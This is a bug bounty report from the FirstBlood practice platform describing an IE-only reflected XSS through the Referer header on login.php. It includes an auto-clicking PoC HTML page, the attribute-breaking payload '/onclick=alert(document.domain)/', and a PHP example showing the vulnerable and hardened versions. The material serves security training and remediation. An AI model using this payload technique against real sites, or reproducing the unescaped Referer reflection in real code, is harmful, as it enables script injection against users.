FirstBlood-#596 — IE-only Reflected XSS
This issue was discovered on FirstBlood v2
On 2021-10-26, r0x61tremy Level 3 reported:
Steps to reproduce
- Start the server on `localhost`.
- Create an HTML file (for example `evil_site.html`) with the following contents:

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="referrer" content="unsafe-url"/>
<title></title>
</head>
<body>
<a id=1 href="https://6e90100d97de-r0x61tremy.a.firstbloodhackers.com/login.php"></a>
<script type="text/javascript">
document.getElementById(1).click();
</script>
</body>
</html>
```

- Save the file in the web root directory on `localhost`.
- In the Internet Explorer browser, follow the link `http://localhost/evil_site.html?asd='/onclick=alert(document.domain)/'`
- You will be redirected to the page `https://6e90100d97de-r0x61tremy.a.firstbloodhackers.com/login.php`.
- Click "Return to previous page". You will see the alert box with `document.domain`.

P.S. This vulnerability only works in the IE browser.
P3 Medium
Endpoint: /login.php
Parameter: href
Payload: '/onclick=alert()/'
FirstBlood ID: 19
Vulnerability Type: Reflective XSS
The `?ref=` parameter on login.php was fixed; in its place the application now reads `$_SERVER['HTTP_REFERER']` to build the "Return to previous page" link. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments, for example!), and the Referer header is vulnerable to reflective XSS.
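The pattern described above, as an added example that is not FirstBlood's own code: an assumed reconstruction of the unescaped Referer reflection beside a hardened replacement that allowlists the referrer's origin and encodes the attribute. Function names, the `$ownHost` parameter and the sample referrer are assumptions.

```php
<?php
// Added example, not FirstBlood's own code: a reconstruction of the pattern the
// report describes and a hardened replacement. Function names are assumptions.

// VULNERABLE (assumed shape of the original): the Referer header is dropped
// unescaped into a single-quoted href. A referrer whose query string carries
//   asd='/onclick=alert(document.domain)/'
// closes the attribute early and adds an onclick handler. Browsers that
// percent-encode the quote before sending the Referer header neutralise it;
// IE 10 forwards it raw, which is why the PoC only fires there.
function back_link_vulnerable(string $referer): string
{
    return "<a href='" . $referer . "'>Return to previous page</a>";
}

// HARDENED: (1) only accept an http(s) referrer on our own host (pass the host
// from configuration, not from the request), otherwise fall back to a fixed
// path; (2) HTML-encode whatever is emitted. ENT_QUOTES matters: before
// PHP 8.1 htmlspecialchars() leaves single quotes alone by default, which
// would leave this single-quoted attribute exploitable.
function back_link_safe(?string $referer, string $ownHost, string $fallback = '/'): string
{
    $target = $fallback;
    if ($referer !== null) {
        $parts = parse_url($referer);
        if (is_array($parts)
            && isset($parts['scheme'], $parts['host'])
            && in_array(strtolower($parts['scheme']), ['http', 'https'], true)
            && strcasecmp($parts['host'], $ownHost) === 0) {
            $target = $referer;
        }
    }
    $encoded = htmlspecialchars($target, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<a href='" . $encoded . "'>Return to previous page</a>";
}

// Constructed sample: the referrer IE would send from the PoC in the report.
$referer = "http://localhost/evil_site.html?asd='/onclick=alert(document.domain)/'";

echo back_link_vulnerable($referer), PHP_EOL;                // onclick lands inside the tag
echo back_link_safe($referer, 'localhost'), PHP_EOL;         // same host: quotes become &#039;
echo back_link_safe($referer, 'app.example'), PHP_EOL;       // foreign host: link points to /
echo back_link_safe('javascript:void(0)', 'localhost'), PHP_EOL; // no host: falls back to /
```

The origin check alone would already have blocked this report's cross-origin referrer; the encoding is what protects a same-origin referrer that happens to carry quotes.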
Creator & Administrator
Nice find, thanks for providing a working PoC and mentioning it only works on IE. Some users reported that the referrer was vulnerable, but the payload provided wouldn't work, and there was no mention of the browser. Great work.